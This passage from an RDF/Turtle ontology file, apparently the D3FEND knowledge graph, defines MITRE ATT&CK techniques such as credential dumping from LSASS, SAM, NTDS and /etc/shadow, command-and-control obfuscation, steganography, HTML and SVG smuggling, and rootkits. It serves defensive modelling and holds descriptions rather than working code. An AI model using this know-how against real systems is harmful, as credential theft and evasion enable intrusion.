mitigate against this technique. If a device is configured to enable AutoRun or AutoPlay, adversaries may execute code on the device by mounting the removable media to the device, either through physical or virtual means. This may be especially relevant for virtual machine environments where disk images may be dynamically mapped to a guest system on a hypervisor." ; rdfs:subClassOf d3f:ATTACKICSExecutionTechnique ; skos:prefLabel "Autorun Image" . d3f:T1001.001 a owl:Class ; rdfs:label "Junk Data" ; d3f:attack-id "T1001.001" ; d3f:definition "Adversaries may add junk data to protocols used for command and control to make detection more difficult.(Citation: FireEye SUNBURST Backdoor December 2020) By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters." ; rdfs:subClassOf d3f:T1001 . d3f:T1001.002 a owl:Class ; rdfs:label "Steganography" ; d3f:attack-id "T1001.002" ; d3f:definition "Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control." ; rdfs:subClassOf d3f:T1001 . d3f:T1001.003 a owl:Class ; rdfs:label "Protocol or Service Impersonation" ; d3f:attack-id "T1001.003" ; d3f:definition "Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic." ; rdfs:subClassOf d3f:T1001 . d3f:T1002 a owl:Class ; rdfs:label "Data Compressed" ; d3f:attack-id "T1002" ; d3f:definition "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib." ; rdfs:comment "This technique has been revoked by T1560" ; rdfs:seeAlso d3f:T1560 ; rdfs:subClassOf d3f:ExfiltrationTechnique ; owl:deprecated true . d3f:T1003.001 a owl:Class, owl:NamedIndividual ; rdfs:label "LSASS Memory" ; d3f:accesses d3f:AuthenticationService, d3f:Process ; d3f:attack-id "T1003.001" ; d3f:definition "Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:accesses ; owl:someValuesFrom d3f:AuthenticationService ], [ a owl:Restriction ; owl:onProperty d3f:accesses ; owl:someValuesFrom d3f:Process ], d3f:T1003 . d3f:T1003.002 a owl:Class, owl:NamedIndividual ; rdfs:label "Security Account Manager" ; d3f:attack-id "T1003.002" ; d3f:definition "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access." ; d3f:may-access d3f:AuthenticationService, d3f:Process, d3f:SystemPasswordDatabase ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:may-access ; owl:someValuesFrom d3f:AuthenticationService ], [ a owl:Restriction ; owl:onProperty d3f:may-access ; owl:someValuesFrom d3f:SystemPasswordDatabase ], [ a owl:Restriction ; owl:onProperty d3f:may-access ; owl:someValuesFrom d3f:Process ], d3f:T1003 . d3f:T1003.003 a owl:Class, owl:NamedIndividual ; rdfs:label "NTDS" ; d3f:accesses d3f:EncryptedCredential ; d3f:attack-id "T1003.003" ; d3f:definition "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\\NTDS\\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory)" ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:accesses ; owl:someValuesFrom d3f:EncryptedCredential ], d3f:T1003 . d3f:T1003.004 a owl:Class, owl:NamedIndividual ; rdfs:label "LSA Secrets" ; d3f:attack-id "T1003.004" ; d3f:definition "Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)" ; d3f:may-access d3f:Process, d3f:SystemPasswordDatabase ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:may-access ; owl:someValuesFrom d3f:Process ], [ a owl:Restriction ; owl:onProperty d3f:may-access ; owl:someValuesFrom d3f:SystemPasswordDatabase ], d3f:T1003 . d3f:T1003.005 a owl:Class, owl:NamedIndividual ; rdfs:label "Cached Domain Credentials" ; d3f:accesses d3f:EncryptedCredential ; d3f:attack-id "T1003.005" ; d3f:definition "Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)" ; d3f:may-modify d3f:Log ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:may-modify ; owl:someValuesFrom d3f:Log ], [ a owl:Restriction ; owl:onProperty d3f:accesses ; owl:someValuesFrom d3f:EncryptedCredential ], d3f:T1003 . d3f:T1003.006 a owl:Class, owl:NamedIndividual ; rdfs:label "DCSync" ; d3f:attack-id "T1003.006" ; d3f:definition "Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync." ; d3f:may-modify d3f:EventLog ; d3f:produces d3f:IntranetAdministrativeNetworkTraffic ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:produces ; owl:someValuesFrom d3f:IntranetAdministrativeNetworkTraffic ], [ a owl:Restriction ; owl:onProperty d3f:may-modify ; owl:someValuesFrom d3f:EventLog ], d3f:T1003 . d3f:T1003.007 a owl:Class, owl:NamedIndividual ; rdfs:label "Proc Filesystem" ; d3f:accesses d3f:OperatingSystemFile, d3f:ProcessImage ; d3f:attack-id "T1003.007" ; d3f:definition "Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)" ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:accesses ; owl:someValuesFrom d3f:OperatingSystemFile ], [ a owl:Restriction ; owl:onProperty d3f:accesses ; owl:someValuesFrom d3f:ProcessImage ], d3f:T1003 . d3f:T1003.008 a owl:Class, owl:NamedIndividual ; rdfs:label "/etc/passwd and /etc/shadow" ; d3f:accesses d3f:EncryptedCredential, d3f:PasswordFile ; d3f:attack-id "T1003.008" ; d3f:definition "Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow. By default, /etc/shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats)" ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:accesses ; owl:someValuesFrom d3f:EncryptedCredential ], [ a owl:Restriction ; owl:onProperty d3f:accesses ; owl:someValuesFrom d3f:PasswordFile ], d3f:T1003 . d3f:T1004 a owl:Class ; rdfs:label "Winlogon Helper DLL" ; d3f:attack-id "T1004" ; d3f:definition "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software\\[Wow6432Node\\]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)" ; rdfs:comment "This technique has been revoked by T1547.004" ; rdfs:seeAlso d3f:T1547.004 ; rdfs:subClassOf d3f:PersistenceTechnique ; owl:deprecated true . d3f:T1005 a owl:Class, owl:NamedIndividual ; rdfs:label "Data from Local System" ; d3f:accesses d3f:File, d3f:LocalResource ; d3f:attack-id "T1005" ; d3f:definition "Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:accesses ; owl:someValuesFrom d3f:File ], [ a owl:Restriction ; owl:onProperty d3f:accesses ; owl:someValuesFrom d3f:LocalResource ], d3f:CollectionTechnique . d3f:T1006 a owl:Class, owl:NamedIndividual ; rdfs:label "Direct Volume Access" ; d3f:accesses d3f:Volume ; d3f:attack-id "T1006" ; d3f:definition "Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)" ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:accesses ; owl:someValuesFrom d3f:Volume ], d3f:DefenseEvasionTechnique . d3f:T1007 a owl:Class, owl:NamedIndividual ; rdfs:label "System Service Discovery" ; d3f:attack-id "T1007" ; d3f:definition "Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query, tasklist /svc, systemctl --type=service, and net start." ; d3f:may-invoke d3f:CreateProcess, d3f:GetRunningProcesses ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:may-invoke ; owl:someValuesFrom d3f:GetRunningProcesses ], [ a owl:Restriction ; owl:onProperty d3f:may-invoke ; owl:someValuesFrom d3f:CreateProcess ], d3f:DiscoveryTechnique . d3f:T1008 a owl:Class, owl:NamedIndividual ; rdfs:label "Fallback Channels" ; d3f:attack-id "T1008" ; d3f:definition "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds." ; d3f:produces d3f:OutboundInternetNetworkTraffic ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:produces ; owl:someValuesFrom d3f:OutboundInternetNetworkTraffic ], d3f:CommandAndControlTechnique . d3f:T1009 a owl:Class ; rdfs:label "Binary Padding" ; d3f:attack-id "T1009" ; d3f:definition "Adversaries can use binary padding to add junk data and change the on-disk representation of malware without affecting the functionality or behavior of the binary. This will often increase the size of the binary beyond what some security tools are capable of handling due to file size limitations." ; rdfs:comment "This technique has been revoked by T1027.001" ; rdfs:seeAlso d3f:T1027.001 ; rdfs:subClassOf d3f:DefenseEvasionTechnique ; owl:deprecated true . d3f:T1010 a owl:Class, owl:NamedIndividual ; rdfs:label "Application Window Discovery" ; d3f:attack-id "T1010" ; d3f:definition "Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)" ; d3f:may-invoke d3f:CreateProcess, d3f:GetOpenWindows ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:may-invoke ; owl:someValuesFrom d3f:CreateProcess ], [ a owl:Restriction ; owl:onProperty d3f:may-invoke ; owl:someValuesFrom d3f:GetOpenWindows ], d3f:DiscoveryTechnique . d3f:T1011.001 a owl:Class ; rdfs:label "Exfiltration Over Bluetooth" ; d3f:attack-id "T1011.001" ; d3f:definition "Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel." ; rdfs:subClassOf d3f:T1011 . d3f:T1012 a owl:Class, owl:NamedIndividual ; rdfs:label "Query Registry" ; d3f:accesses d3f:SystemConfigurationDatabase ; d3f:attack-id "T1012" ; d3f:definition "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software." ; d3f:may-invoke d3f:GetSystemConfigValue ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:accesses ; owl:someValuesFrom d3f:SystemConfigurationDatabase ], [ a owl:Restriction ; owl:onProperty d3f:may-invoke ; owl:someValuesFrom d3f:GetSystemConfigValue ], d3f:DiscoveryTechnique . d3f:T1013 a owl:Class ; rdfs:label "Port Monitors" ; d3f:attack-id "T1013" ; d3f:definition "A port monitor can be set through the (Citation: AddMonitor) API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors." ; rdfs:comment "This technique has been revoked by T1547.010" ; rdfs:seeAlso d3f:T1547.010 ; rdfs:subClassOf d3f:PersistenceTechnique, d3f:PrivilegeEscalationTechnique ; owl:deprecated true . d3f:T1014 a owl:Class, owl:NamedIndividual ; rdfs:label "Rootkit" ; d3f:attack-id "T1014" ; d3f:definition "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)" ; d3f:may-modify d3f:BootSector, d3f:Firmware, d3f:Kernel, d3f:KernelModule, d3f:SharedLibraryFile ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:may-modify ; owl:someValuesFrom d3f:BootSector ], [ a owl:Restriction ; owl:onProperty d3f:may-modify ; owl:someValuesFrom d3f:Kernel ], [ a owl:Restriction ; owl:onProperty d3f:may-modify ; owl:someValuesFrom d3f:KernelModule ], [ a owl:Restriction ; owl:onProperty d3f:may-modify ; owl:someValuesFrom d3f:Firmware ], [ a owl:Restriction ; owl:onProperty d3f:may-modify ; owl:someValuesFrom d3f:SharedLibraryFile ], d3f:DefenseEvasionTechnique . d3f:T1015 a owl:Class ; rdfs:label "Accessibility Features" ; d3f:attack-id "T1015" ; d3f:definition "Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system." ; rdfs:comment "This technique has been revoked by T1546.008" ; rdfs:seeAlso d3f:T1546.008 ; rdfs:subClassOf d3f:PersistenceTechnique, d3f:PrivilegeEscalationTechnique ; owl:deprecated true . d3f:T1016.001 a owl:Class ; rdfs:label "Internet Connection Discovery" ; d3f:attack-id "T1016.001" ; d3f:definition "Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert, and GET requests to websites." ; rdfs:subClassOf d3f:T1016 . d3f:T1016.002 a owl:Class ; rdfs:label "Wi-Fi Discovery" ; d3f:attack-id "T1016.002" ; d3f:definition "Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns." ; rdfs:subClassOf d3f:T1016 . d3f:T1017 a owl:Class ; rdfs:label "Application Deployment Software" ; d3f:attack-id "T1017" ; d3f:definition "Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators. The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment." ; rdfs:comment "This technique has been revoked by T1072" ; rdfs:seeAlso d3f:T1072 ; rdfs:subClassOf d3f:LateralMovementTechnique ; owl:deprecated true . d3f:T1018 a owl:Class, owl:NamedIndividual ; rdfs:label "Remote System Discovery" ; d3f:attack-id "T1018" ; d3f:definition "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039)." ; d3f:may-access d3f:OperatingSystemConfigurationFile ; d3f:may-invoke d3f:CreateProcess, d3f:CreateSocket ; d3f:produces d3f:NetworkTraffic ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:may-invoke ; owl:someValuesFrom d3f:CreateSocket ], [ a owl:Restriction ; owl:onProperty d3f:produces ; owl:someValuesFrom d3f:NetworkTraffic ], [ a owl:Restriction ; owl:onProperty d3f:may-invoke ; owl:someValuesFrom d3f:CreateProcess ], [ a owl:Restriction ; owl:onProperty d3f:may-access ; owl:someValuesFrom d3f:OperatingSystemConfigurationFile ], d3f:DiscoveryTechnique . d3f:T1019 a owl:Class ; rdfs:label "System Firmware" ; d3f:attack-id "T1019" ; d3f:definition "The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)" ; rdfs:comment "This technique has been revoked by T1542.001" ; rdfs:seeAlso d3f:T1542.001 ; rdfs:subClassOf d3f:PersistenceTechnique ; owl:deprecated true . d3f:T1020.001 a owl:Class ; rdfs:label "Traffic Duplication" ; d3f:attack-id "T1020.001" ; d3f:definition "Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)" ; rdfs:subClassOf d3f:T1020 . d3f:T1021.003 a owl:Class ; rdfs:label "Distributed Component Object Model" ; d3f:attack-id "T1021.003" ; d3f:definition "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user." ; rdfs:subClassOf d3f:T1021 . d3f:T1021.004 a owl:Class, owl:NamedIndividual ; rdfs:label "SSH" ; d3f:attack-id "T1021.004" ; d3f:creates d3f:SSHSession ; d3f:definition "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user." ; d3f:produces d3f:AdministrativeNetworkTraffic ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:creates ; owl:someValuesFrom d3f:SSHSession ], [ a owl:Restriction ; owl:onProperty d3f:produces ; owl:someValuesFrom d3f:AdministrativeNetworkTraffic ], d3f:T1021 . d3f:T1021.005 a owl:Class ; rdfs:label "VNC" ; d3f:attack-id "T1021.005" ; d3f:definition "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)" ; rdfs:subClassOf d3f:T1021 . d3f:T1021.007 a owl:Class ; rdfs:label "Cloud Services" ; d3f:attack-id "T1021.007" ; d3f:definition "Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078) that are synchronized with or federated to on-premises user identities. The adversary may then perform management actions or access cloud-hosted resources as the logged-on user." ; rdfs:subClassOf d3f:T1021 . d3f:T1021.008 a owl:Class ; rdfs:label "Direct Cloud VM Connections" ; d3f:attack-id "T1021.008" ; d3f:definition "Adversaries may leverage [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log directly into accessible cloud hosted compute infrastructure through cloud native methods. Many cloud providers offer interactive connections to virtual infrastructure that can be accessed through the [Cloud API](https://attack.mitre.org/techniques/T1059/009), such as Azure Serial Console(Citation: Azure Serial Console), AWS EC2 Instance Connect(Citation: EC2 Instance Connect)(Citation: lucr-3: Getting SaaS-y in the cloud), and AWS System Manager.(Citation: AWS System Manager)." ; rdfs:subClassOf d3f:T1021 . d3f:T1022 a owl:Class ; rdfs:label "Data Encrypted" ; d3f:attack-id "T1022" ; d3f:definition "Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip." ; rdfs:comment "This technique has been revoked by T1560" ; rdfs:seeAlso d3f:T1560 ; rdfs:subClassOf d3f:ExfiltrationTechnique ; owl:deprecated true . d3f:T1023 a owl:Class ; rdfs:label "Shortcut Modification" ; d3f:attack-id "T1023" ; d3f:definition "Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program." ; rdfs:comment "This technique has been revoked by T1547.009" ; rdfs:seeAlso d3f:T1547.009 ; rdfs:subClassOf d3f:PersistenceTechnique ; owl:deprecated true . d3f:T1024 a owl:Class ; rdfs:label "Custom Cryptographic Protocol" ; d3f:attack-id "T1024" ; d3f:definition "Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a fixed key, will produce a very weak ciphertext." ; rdfs:comment "This technique has been revoked by T1573" ; rdfs:seeAlso d3f:T1573 ; rdfs:subClassOf d3f:CommandAndControlTechnique ; owl:deprecated true . d3f:T1025 a owl:Class, owl:NamedIndividual ; rdfs:label "Data from Removable Media" ; d3f:accesses d3f:RemovableMediaDevice ; d3f:attack-id "T1025" ; d3f:definition "Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:accesses ; owl:someValuesFrom d3f:RemovableMediaDevice ], d3f:CollectionTechnique . d3f:T1026 a owl:Class ; rdfs:label "Multiband Communication" ; d3f:attack-id "T1026" ; d3f:definition "**This technique has been deprecated and should no longer be used.**" ; rdfs:comment "**This technique has been deprecated and should no longer be used.**" ; rdfs:subClassOf d3f:CommandAndControlTechnique ; owl:deprecated true . d3f:T1027.003 a owl:Class ; rdfs:label "Steganography" ; d3f:attack-id "T1027.003" ; d3f:definition "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files." ; rdfs:subClassOf d3f:T1027 . d3f:T1027.006 a owl:Class, owl:NamedIndividual ; rdfs:label "HTML Smuggling" ; d3f:attack-id "T1027.006" ; d3f:creates d3f:JavaScriptBlob ; d3f:definition "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)" ; d3f:hides d3f:DigitalArtifact ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:hides ; owl:someValuesFrom d3f:DigitalArtifact ], [ a owl:Restriction ; owl:onProperty d3f:creates ; owl:someValuesFrom d3f:JavaScriptBlob ], d3f:T1027 . d3f:T1027.007 a owl:Class ; rdfs:label "Dynamic API Resolution" ; d3f:attack-id "T1027.007" ; d3f:definition "Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts." ; rdfs:subClassOf d3f:T1027 . d3f:T1027.008 a owl:Class ; rdfs:label "Stripped Payloads" ; d3f:attack-id "T1027.008" ; d3f:definition "Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system’s `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.(Citation: Mandiant golang stripped binaries explanation)(Citation: intezer stripped binaries elf files 2018)" ; rdfs:subClassOf d3f:T1027 . d3f:T1027.009 a owl:Class ; rdfs:label "Embedded Payloads" ; d3f:attack-id "T1027.009" ; d3f:definition "Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution controls such as digital signatures and notarization tickets.(Citation: Sentinel Labs)" ; rdfs:subClassOf d3f:T1027 . d3f:T1027.010 a owl:Class ; rdfs:label "Command Obfuscation" ; d3f:attack-id "T1027.010" ; d3f:definition "Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)" ; rdfs:subClassOf d3f:T1027 . d3f:T1027.011 a owl:Class ; rdfs:label "Fileless Storage" ; d3f:attack-id "T1027.011" ; d3f:definition "Adversaries may store data in \"fileless\" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless)" ; rdfs:subClassOf d3f:T1027 . d3f:T1027.012 a owl:Class ; rdfs:label "LNK Icon Smuggling" ; d3f:attack-id "T1027.012" ; d3f:definition "Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign windows shortcut files. Windows shortcut files (.LNK) include many metadata fields, including an icon location field (also known as the `IconEnvironmentDataBlock`) designed to specify the path to an icon file that is to be displayed for the LNK file within a host directory." ; rdfs:subClassOf d3f:T1027 . d3f:T1027.013 a owl:Class ; rdfs:label "Encrypted/Encoded File" ; d3f:attack-id "T1027.013" ; d3f:definition "Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use." ; rdfs:subClassOf d3f:T1027 . d3f:T1027.014 a owl:Class ; rdfs:label "Polymorphic Code" ; d3f:attack-id "T1027.014" ; d3f:definition "Adversaries may utilize polymorphic code (also known as metamorphic or mutating code) to evade detection. Polymorphic code is a type of software capable of changing its runtime footprint during code execution.(Citation: polymorphic-blackberry) With each execution of the software, the code is mutated into a different version of itself that achieves the same purpose or objective as the original. This functionality enables the malware to evade traditional signature-based defenses, such as antivirus and antimalware tools.(Citation: polymorphic-sentinelone)" ; rdfs:subClassOf d3f:T1027 . d3f:T1027.015 a owl:Class ; rdfs:label "Compression" ; d3f:attack-id "T1027.015" ; d3f:definition "Adversaries may use compression to obfuscate their payloads or files. Compressed file formats such as ZIP, gzip, 7z, and RAR can compress and archive multiple files together to make it easier and faster to transfer files. In addition to compressing files, adversaries may also compress shellcode directly - for example, in order to store it in a Windows Registry key (i.e., [Fileless Storage](https://attack.mitre.org/techniques/T1027/011)).(Citation: Trustwave Pillowmint June 2020)" ; rdfs:subClassOf d3f:T1027 . d3f:T1027.016 a owl:Class ; rdfs:label "Junk Code Insertion" ; d3f:attack-id "T1027.016" ; d3f:definition "Adversaries may use junk code / dead code to obfuscate a malware’s functionality. Junk code is code that either does not execute, or if it does execute, does not change the functionality of the code. Junk code makes analysis more difficult and time-consuming, as the analyst steps through non-functional code instead of analyzing the main code. It also may hinder detections that rely on static code analysis due to the use of benign functionality, especially when combined with [Compression](https://attack.mitre.org/techniques/T1027/015) or [Software Packing](https://attack.mitre.org/techniques/T1027/002).(Citation: ReasonLabs)(Citation: ReasonLabs Cyberpedia Junk Code)" ; rdfs:subClassOf d3f:T1027 . d3f:T1027.017 a owl:Class ; rdfs:label "SVG Smuggling" ; d3f:attack-id "T1027.017" ; d3f:definition "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign SVG files.(Citation: Trustwave SVG Smuggling 2025) SVGs, or Scalable Vector Graphics, are vector-based image files constructed using XML. As such, they can legitimately include `